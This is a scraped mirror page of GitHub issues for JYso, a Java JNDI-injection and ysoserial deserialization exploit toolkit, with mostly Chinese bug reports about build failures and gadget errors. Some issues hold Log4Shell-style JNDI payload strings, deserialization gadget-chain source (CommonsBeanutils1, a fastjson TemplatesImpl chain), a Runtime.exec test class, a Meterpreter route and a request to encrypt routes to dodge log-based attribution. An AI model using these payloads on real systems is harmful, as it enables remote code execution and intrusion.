Giter Site home page Giter Site logo

qi4l / jyso Goto Github PK

View Code? Open in Web Editor NEW
1.3K 65.0 158.0 270.4 MB

It can be either a JNDIExploit or a ysoserial.

License: GNU General Public License v3.0

Java 100.00%
java attack jndi-injection web-security mem-shell middleware-echo jndi ldap rmi gadget

jyso's Issues

fastjson 链templates逻辑存在问题

作者您好,在您的项目中我注意到您先javassist构造了一个执行getRuntime.exec()的恶意类,后来又createTemplatesImpl获取一个对象后setValue降恶意类换成了javassist构造的那个,导致不管用什么命令他都是在调用getRuntime执行命令,无法打入内存马。
这样可以解决这个问题:
final Object templates;
if (JYsoMode.contains("yso")) {
templates = GadgetsYso.createTemplatesImpl(param[0]);
} else {
templates = Gadgets.createTemplatesImpl(type, param);
}

    JSONArray jsonArray = new JSONArray();
    jsonArray.add(templates);

    BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
    setValue(bd,"val",jsonArray);

    HashMap<Object, Object> hashMap = new HashMap<>();
    hashMap.put(templates,bd);

    return hashMap;

编译错误

编译错误,这几个包是缺失的吗

Could not determine the dependencies of task ':shadowJar'.
> Could not resolve all dependencies for configuration ':runtimeClasspath'.
   > Could not find javax.media.jai:jai-core:1.1.3.
     Searched in the following locations:
       - file:/home/xxx/.m2/repository/javax/media/jai/jai-core/1.1.3/jai-core-1.1.3.pom
       - https://repo.jenkins-ci.org/releases/javax/media/jai/jai-core/1.1.3/jai-core-1.1.3.pom
       - https://repo.maven.apache.org/maven2/javax/media/jai/jai-core/1.1.3/jai-core-1.1.3.pom
     Required by:
         project :
   > Could not find com.oracle.weblogic:weblogic-server:1.0.
     Searched in the following locations:
       - file:/home/xxx/.m2/repository/com/oracle/weblogic/weblogic-server/1.0/weblogic-server-1.0.pom
       - https://repo.jenkins-ci.org/releases/com/oracle/weblogic/weblogic-server/1.0/weblogic-server-1.0.pom
       - https://repo.maven.apache.org/maven2/com/oracle/weblogic/weblogic-server/1.0/weblogic-server-1.0.pom
     Required by:
         project :

存在大量报错 NPE

启动命令行:java -jar JYso-3.1.jar --jndi -i xxxx

测试代码:${jndi:ldap://1.1.1.1:1389/Deserialization/Spring1/command/Base64/{{base64(ping -c 3 1.1.1.1)}}}

报错信息:

[+] Received LDAP Query >> Deserialization/Spring1/command/Base64/cGluZyAtYyAzIDEuMS4xLjE=
[+] GaddgetType >> Spring1
[+] command:ping -c 3 1.1.1.1
[+]Send LDAP result forDeserialization/Spring1/command/Base64/cGluZyAtYyAzIDEuMS4xLjE= with javaSerializedData attribute
Error while generating or serializing payload
java.lang.NullPointerException
        at com.qi4l.jndi.gadgets.Spring1.getObject(Spring1.java:54)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:54)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)


[+] Received LDAP Query >> Deserialization/Spring1/command/Base64/cGluZyAtYyAzIDEuMS4xLjE=
[+] GaddgetType >> Spring1
[+] command:ping -c 3 1.1.1.1
[+]Send LDAP result forDeserialization/Spring1/command/Base64/cGluZyAtYyAzIDEuMS4xLjE= with javaSerializedData attribute
Error while generating or serializing payload
java.lang.NullPointerException
        at com.qi4l.jndi.gadgets.Spring1.getObject(Spring1.java:54)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:54)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)

图片

不仅仅是Spring1,像是ROME2,Jdk7u21variant、JRE8u20_2、JBossInterceptors1等等都会出现

图片

另外MozillaRhino2等gadget会报错 java.lang.NoSuchMethodException

图片

这些gadget估计都得测一下了

实验不成功

哥们,你这个readme里面密码不对啊 ,多次实验不成功,能不能写的清楚一点啊 ,谢谢啊

本地yso无法生成文件

java -jar JYso-3.4.jar -hk "aaa" -hv "bbb" -u "/*" -g CommonsCollections6 -p EX-MS-TSMSFromThread-suo5 -f cc6-suo5.bin

没有生成文件

2个小问题

师傅你好 在某些jndi场景中 只能 jndi://1.1.1.1/connect

connect 不可控 那么这个时候就需要让 connect 为某个链

第二个场景就是

jndi必须要使用账号密码认证

请问这两个功能是否可以增加 🙏

yso的LF-功能加载类文件失败

命令:
java -jar JYso-3.5.5.jar -yso 1 -g CommonsCollections10 -p '/Users/test/Desktop/Calc.class' -f calc.ser
然后对calc.ser进行base64,无法成功弹计算器,不报异常

使用
java -jar ysoserial-for-woodpecker-0.5.2.jar -g CommonsCollections10 -a "class_file:/Users/test/Desktop/Calc.class"
可以成功弹计算器。

环境:macos
jdk: 1.8.0_191
calc:
`package org.ppp.tools.ser;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.util.Scanner;

public class Calc extends AbstractTranslet {
static {
try{
Runtime.getRuntime().exec("open -a Calculator.app");
}catch (Exception e){

    }
}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}

}
`

cb链依赖问题

用1.3.0版本的生成的所有cb链用的都是1.8.3版本的,不会自动寻找它指定的版本。

使用其他链的执行命令的时候出错

[+] Received LDAP Query : Deserialization/LiNUX/command/Base64/Y3VybCAw
[+] GaddgetType : LiNUX
[+] command:curl xxx
[+] Send LDAP result forDeserialization/LiNUX/command/Base64/Y3VybC with javaSerializedData attribute
LmNu with javaSerializedData attribute
-------------------------------------- JNDI Remote Refenrence Links --------------------------------------
Error while generating or serializing payload
java.lang.NullPointerException
at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:42)
at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:122)
at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
是我使用错误了吗

wiki问题

意思是只有针对 ChainedTransformer的才能进行如下操作吗? 不太对应。
image

低版本的CommonsBeanutils 解决办法自己修改代码。希望作者更新一下代码

          我测试了一下就是代码的问题修改一下代码就可以用了你这个代码不兼容低版本  我修改的这个项目的代码 https://github.com/957204459/ysoserial-1   直接成功执行。希望大佬可以考虑兼容低版本的 commons-beanutils  比如这个 。融合所有工具的特点再次感谢大佬回复
commons-beanutils commons-beanutils 1.6.1 package com.qi4l.jndi.gadgets;

import com.qi4l.jndi.enumtypes.PayloadType;
import com.qi4l.jndi.gadgets.annotation.Authors;
import com.qi4l.jndi.gadgets.annotation.Dependencies;
import com.qi4l.jndi.gadgets.utils.Gadgets;
import com.qi4l.jndi.gadgets.utils.GadgetsYso;
import com.qi4l.jndi.gadgets.utils.Reflections;
import org.apache.commons.beanutils.BeanComparator;

import java.util.PriorityQueue;
import java.math.BigInteger;

import static com.qi4l.jndi.Starter.JYsoMode;

@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
@authors({Authors.FROHOFF})
public class commonsbeanutils1 implements ObjectPayload {

public Object getObject(PayloadType type, String... param) throws Exception {
   // final Object template;
    /* if (JYsoMode.contains("yso")) {
        template = GadgetsYso.createTemplatesImpl(param[0]);
    } else {
        template = Gadgets.createTemplatesImpl(type, param);
    } */
	
	final Object template = GadgetsYso.createTemplatesImpl(param[0]);
   // final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

final BeanComparator comparator = new BeanComparator("lowestSetBit");
final PriorityQueue queue = new PriorityQueue(2, comparator);
/* queue.add("1");
queue.add("1"); */
queue.add(new BigInteger("1"));
queue.add(new BigInteger("1"));

    Reflections.setFieldValue(comparator, "property", "outputProperties");
    Reflections.setFieldValue(queue, "queue", new Object[]{template, template});

    return queue;
}

}

Originally posted by @peiqiF4ck in #37 (comment)

再次感谢作者的付出,另外作者是否考虑使用maven这个。 gradle是在是比较麻烦。改了低版本的依赖他不会自行更改。。。。。同样的代码修改了一波使用maven可以 使用gradle不可以了。也可能是 commons-beanutils 代码改了 其他地方代码没有修改。总结我用这个 https://github.com/957204459/ysoserial-1 直接修改ommons-beanutils代码 和ommons-beanutils 版本号为 1.6.1 直接就行了。 但是大佬您这个gradle的这个修改了版本和代码的都不行 大佬有时间可否看看哪里有问题。感谢大佬

关于url路由部分的疑问

师傅,有些特殊的链构造出来路由是\而不是/,比如su18 ysoserial这个payload

https://github.com/5l1v3r1/ysoserial-1/blob/4888f68782953c98de09f81f44f563d9c0cc1376/src/main/java/org/su18/ysuserial/payloads/CommonsBeanutils4.java#L12

按照su18说的,在LdapServer#processSearchResult加一行 base = base.replace('\\','/');,这块是否可兼容加上,或者有其他的解决方法?

图片


我有个想法

支持把路由路径加密

比如用aes加密算法将 ldap://0.0.0.0:1389/Deserialization/C3P04/qi4l/Base64/xxxxxxxx加密为ldap://0.0.0.0:1389/YUAs7rWm/Al9Cw0LG9jzJxMXyu5WjeBuyxxxxxxxx

在LdapServer等入口处,尝试解密,解密不了的话继续按默认逻辑走

这样可以在一定程度上避免从日志中泄露出原始命令,也减少了特征

支持路径路径缩短映射

在HTTPServer中提供一个接口给外部脚本调用,加个map变量存一下映射关系,用来做路由地址映射转换,类似于url缩短服务,变成一个短链接

比如可以把非常长的 ldap://0.0.0.0:1389/Deserialization/CommonsCollections1/qi4l/Base64/{{base64(BC-$BCEL$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)} 缩短为 ldap://0.0.0.0:1389/a


jndi:ldap://0.0.0.0:1389/Deserialization/C3P04/qi4l/Base64/xxxxxxxx

现在默认场景下的url带有比较特殊的qi4l,有这个的话感觉会不会后续变成一个溯源特征

无法启动

C:\Penetration\ExpolitTools\Tools\JYso\JYso-1.2.9>java -jar JYso-1.2.9.jar
C:\Penetration\ExpolitTools\Tools\JYso\JYso-1.2.9>java -jar JYso-1.2.9.jar -h
C:\Penetration\ExpolitTools\Tools\JYso\JYso-1.2.9>java -jar JYso-1.2.9.jar --jndi
C:\Penetration\ExpolitTools\Tools\JYso\JYso-1.2.9>java -jar JYso-1.2.9.jar --jndi -h

最新1.2.9版本运行没有任何输出
QQ截图20240429161211

latest 1.2.9 Error while generating or serializing payload

➜  JYso java -version                                                                         
openjdk version "11.0.22" 2024-01-16

➜  JYso java -jar JYso-1.2.9.jar -y -g CommonsBeanutils5 -p 'EX-TomcatEcho' -ch 'cmd' -utf|hex
Error while generating or serializing payload
java.lang.NullPointerException
        at java.base/java.lang.String.<init>(String.java:614)
        at com.qi4l.jndi.gadgets.utils.Utils.base64Decode(Utils.java:63)
        at com.qi4l.jndi.gadgets.utils.handle.ClassMethodHandler.insertCMD(ClassMethodHandler.java:220)
        at com.qi4l.jndi.gadgets.utils.handle.ClassMethodHandler.insertKeyMethodByClassName(ClassMethodHandler.java:40)
        at com.qi4l.jndi.gadgets.utils.handle.GlassHandler.generateClass(GlassHandler.java:105)
        at com.qi4l.jndi.gadgets.utils.handle.GlassHandler.generateClass(GlassHandler.java:64)
        at com.qi4l.jndi.gadgets.utils.Gadgets.createTemplatesImpl(Gadgets.java:96)
        at com.qi4l.jndi.gadgets.CommonsBeanutils5.getObject(CommonsBeanutils5.java:22)
        at com.qi4l.jndi.controllers.ysoserial.ysoserial(ysoserial.java:134)
        at com.qi4l.jndi.Starter.main(Starter.java:29)

有不少gadget会报错

3.5版本
jdk 1.8.0_281,linux

MozillaRhino2

[+] Received LDAP Query >> Deserialization/MozillaRhino2/command/Base64/cGluZyAtbiAyIDEuMS4xLjE=
[+] GaddgetType >> MozillaRhino2
[+] command:ping -n 2 1.1.1.1
[+]Send LDAP result forDeserialization/MozillaRhino2/command/Base64/cGluZyAtbiAyIDEuMS4xLjE= with javaSerializedData attribute
Error while generating or serializing payload
java.lang.NoSuchMethodException: com.qi4l.jndi.gadgets.MozillaRhino2.customWriteAdapterObject(java.lang.Object, java.io.ObjectOutputStream)
        at java.lang.Class.getMethod(Class.java:1786)
        at com.qi4l.jndi.gadgets.MozillaRhino2.getObject(MozillaRhino2.java:76)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:56)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)

JRE8u20_2


[+] Received LDAP Query >> Deserialization/JRE8u20_2/command/Base64/cGluZyAtbiAyIDEuMS4xLjE=
[+] GaddgetType >> JRE8u20_2
[+] command:ping -n 2 1.1.1.1
[+]Send LDAP result forDeserialization/JRE8u20_2/command/Base64/cGluZyAtbiAyIDEuMS4xLjE= with javaSerializedData attribute
Error while generating or serializing payload
javassist.CannotCompileException: by java.lang.ClassFormatError: loader (instance of  sun/misc/Launcher$AppClassLoader): attempted  duplicate class definition for name: "sun/reflect/annotation/AnnotationInvocationHandler"
        at javassist.util.proxy.DefineClassHelper.toClass(DefineClassHelper.java:271)
        at javassist.ClassPool.toClass(ClassPool.java:1240)
        at javassist.ClassPool.toClass(ClassPool.java:1098)
        at javassist.ClassPool.toClass(ClassPool.java:1056)
        at javassist.CtClass.toClass(CtClass.java:1298)
        at com.qi4l.jndi.gadgets.JRE8u20_2.newInvocationHandlerClass(JRE8u20_2.java:29)
        at com.qi4l.jndi.gadgets.JRE8u20_2.getObject(JRE8u20_2.java:43)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:56)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
Caused by: java.lang.ClassFormatError: loader (instance of  sun/misc/Launcher$AppClassLoader): attempted  duplicate class definition for name: "sun/reflect/annotation/AnnotationInvocationHandler"
        at javassist.util.proxy.DefineClassHelper$Java7.defineClass(DefineClassHelper.java:182)
        at javassist.util.proxy.DefineClassHelper.toClass(DefineClassHelper.java:260)
        ... 11 more

CommonsBeanutilsPropertySource183

Error while generating or serializing payload
java.lang.RuntimeException: org.apache.commons.beanutils.BeanComparator class is frozen
        at javassist.CtClassType.checkModify(CtClassType.java:334)
        at javassist.CtClassType.removeField(CtClassType.java:1431)
        at com.qi4l.jndi.gadgets.CommonsBeanutilsPropertySource183.getObject(CommonsBeanutilsPropertySource183.java:44)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:56)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)

另外有些gadget没有包含在反序列化路由里面
CommonsCollectionsK7
CommonsCollections6Lite

msf使用报错

支持tomcatBypass路由直接上线msf:
使用msf的java/meterpreter/reverse_tcp开启监听
ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]

请问按照这个格式打的,为什么会提示报错呢?
e21ae3d558f9a83ded85ae2653fed5b
image

bug

% java -jar JYso-3.4.jar -yso 1 --rhino -g CommonsCollections5 -p EX-TomcatEcho -ch via -f 5.ser

Error while generating or serializing payload
javassist.NotFoundException: initClassBytes(..) is not found in org.apache.myfaces.myfaces.debug.TagAware
at javassist.CtClassType.getDeclaredMethod(CtClassType.java:1356)
at com.qi4l.jndi.gadgets.utils.handle.ClassMethodHandler.insertMethod(ClassMethodHandler.java:28)
at com.qi4l.jndi.gadgets.utils.Utils.encapsulationByClassLoaderTemplate(Utils.java:137)
at com.qi4l.jndi.gadgets.utils.cc.TransformerUtil.makeTransformer(TransformerUtil.java:68)
at com.qi4l.jndi.gadgets.CommonsCollections5.getObject(CommonsCollections5.java:53)
at com.qi4l.jndi.gadgets.CommonsCollections5.getObject(CommonsCollections5.java:42)
at com.qi4l.jndi.Starter.main(Starter.java:165)

大佬我在咨询一下 使用 CommonsBeanutils-1.6.1 编译出来执行直接报错 java -jar JYso-1.2.8-all.jar -y -g CommonsBeanutils1 -p "EX-TomcatEcho"

          大佬我在咨询一下 使用 CommonsBeanutils-1.6.1 编译出来执行直接报错  java -jar JYso-1.2.8-all.jar -y -g  CommonsBeanutils1  -p "EX-TomcatEcho"

██╗ ██╗███████╗ ██████╗
╚██╗ ██╔╝██╔════╝██╔═══██╗
╚████╔╝ ███████╗██║ ██║
╚██╔╝ ╚════██║██║ ██║
██║ ███████║╚██████╔╝
╚═╝ ╚══════╝ ╚═════╝

Error while generating or serializing payload
java.lang.ClassCastException: java.lang.IllegalArgumentException: No name specified
at org.apache.commons.beanutils.BeanComparator.compare(BeanComparator.java:145)
at java.util.PriorityQueue.siftUpUsingComparator(Unknown Source)
at java.util.PriorityQueue.siftUp(Unknown Source)
at java.util.PriorityQueue.offer(Unknown Source)
at java.util.PriorityQueue.add(Unknown Source)
at com.qi4l.jndi.gadgets.CommonsBeanutils1.getObject(CommonsBeanutils1.java:22)
at com.qi4l.jndi.controllers.ysoserial.ysoserial(ysoserial.java:134)
at com.qi4l.jndi.Starter.main(Starter.java:29)

大佬 使用 CommonsBeanutils-1.8.3 可以编译也可以执行 java -jar JYso-1.2.8-all.jar -y -g CommonsBeanutils1 -p "EX-TomcatEcho"
██╗ ██╗███████╗ ██████╗
╚██╗ ██╔╝██╔════╝██╔═══██╗
╚████╔╝ ███████╗██║ ██║
╚██╔╝ ╚════██║██║ ██║
██║ ███████║╚██████╔╝
╚═╝ ╚══════╝ ╚═════╝

 �sr �java.util.PriorityQueue斱0贷?偙� �I �sizeL
comparatort �Ljava/util/Comparator;xp �sr +org.apache.commons.beanutils.BeanComparator

但是同样使用 https://github.com/957204459/ysoserial-1

使用 CommonsBeanutils-1.6.1 没有报错并且可以执行成功 java -jar ysuserial-1.5-su18-all.jar -g CommonsBeanutils1 -p "EX-TomcatEcho"

这是什么情况大佬。另外如何生成payload的时候不输出yso这个logo我本地但是可以直接注销。现在的问题是用同样的jar包编译出来的东西一个可以执行一个执行不了。我不知道是不是gradle的问题。我直接把 CommonsBeanutils-1.6.1 放到lib文件夹里面了。大佬如何在gradle里面强制让他使用CommonsBeanutil 1.6.1 并且自动加载所需要的依赖。接触gradle不多。maven直接配置就行了。gradle我配置了
commons-beanutils-commons-beanutils = "1.6.1" 他默认还是 1.8.3的jar包。。。。。我得把 1.6.1的jar放到lib目录他才用我的。并且配置这以后gradle不会下载1.6.1的包只会下载1.8.3的包。。。。。我手工将1.6.1的包放到gradle里面编译是没问题就是执行报错了。。
另外编译用三个包就行了 :
jai_core-1.1.3.jar
weblogic-server.jar
wlthint3client.jar

有些payload发送之后会导致服务端jndi进程强制退出

师傅我用的是3.2最新版,测了一下

  1. 发送JRE8u20请求后进程强制退出了
    测试代码:
${jndi:ldap://1.1.1.1:1389/Deserialization/**JRE8u20**/command/Base64/{{base64(ping -c 3  1.1.1.1)}}}

图片

对于JRE8u20_2还是存在NPE异常的情况(详情https://github.com/qi4L/JYso/issues/10)

图片

  1. 对于Jackson,会出现报错,原因不明
Error while generating or serializing payload
javassist.NotFoundException: writeReplace(..) is not found in com.fasterxml.jackson.databind.node.BaseJsonNode
        at javassist.CtClassType.getDeclaredMethod(CtClassType.java:1356)
        at com.qi4l.jndi.gadgets.Jackson.getObject(Jackson.java:35)
        at com.qi4l.jndi.controllers.SerializedDataController.sendResult(SerializedDataController.java:54)
        at com.qi4l.jndi.LdapServer.processSearchResult(LdapServer.java:123)
        at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
        at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
        at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)

打包问题

提示无
Could not find javax.media.jai:jai-core:1.1.3
Could not find com.oracle.weblogic:weblogic-server:1.0.
是否有解决方法

使用反序列化加载自定义类无法成功注入

1、使用woodpecker 加载自定义内存马类
image

2、使用JYSO
image

进行base64
image

3、反序列化测试
image
失败
image

woodpecker测试,连接成功

博主可自行对比两个工具生成的payload,并进行反序列化调试
JYso:


Woodpecker:


内存马问题

cmd和bx马可以使用但是gsl马为何连不上是否为配置错误 使用为/TomcatBypass/M-EX-MS-TSMSFromJMXS-gzraw,加密器两个都试过
image
image

大佬使用idea 编译报错提示找不到包

Could not find javax.media.jai:jai-core:1.1.3
Could not find com.oracle.weblogic:weblogic-server:1.0
尤其是weblogic-server 1.0的包这我搜索了一下根本没有。这个怎么解决啊大佬。还是说包名不是1.0是别的版本希望大佬指点

问题反馈

用的jdk是8_341,使用DNSLOG探测发现报错了,看了下代码,貌似是调用了GadgetType去判断Deserialization后面的参数,一些序列化链的逻辑没法走到
AE5BB8BC-0212-41D1-BDEE-4F0EE4E914F8

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.